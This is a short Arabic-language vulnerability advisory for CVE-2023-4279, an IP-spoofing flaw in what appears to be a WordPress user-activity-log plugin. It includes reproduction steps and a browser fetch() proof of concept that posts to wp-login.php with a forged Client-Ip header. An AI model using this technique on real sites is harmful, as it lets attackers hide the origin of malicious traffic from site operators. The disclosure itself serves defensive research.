
مستودع لثغرة CVE-2023-4279.
معرّف CVE: CVE-2023-4279
نوع الثغرة الأمنية: انتحال عنوان IP
الوصف: يقوم هذا الملحق باسترداد عناوين IP الخاصة بالعملاء من رؤوس غير موثوقة محتملة، مما يسمح للمهاجم بالتلاعب بقيمتها. قد يُستخدم هذا لإخفاء مصدر الحركة الضارة.
خطوات إعادة الإنتاج:
1. في سجل نشاط المستخدم > الإعدادات، قم بتمكين الخيار "السماح بتسجيل عنوان IP للمستخدمين" واحفظ الإعدادات.
2. قم بتشغيل الكود التالي في متصفح الويب ولاحظ في الجهة الخلفية أن عنوان IP قد تم تزويره.
await fetch("/wp-login.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
"Client-Ip": "8.8.8.8",
},
"body": "log=USERNAME&pwd=PASSWORD",
"method": "POST",
"mode": "cors",
"credentials": "include"
});
المراجع: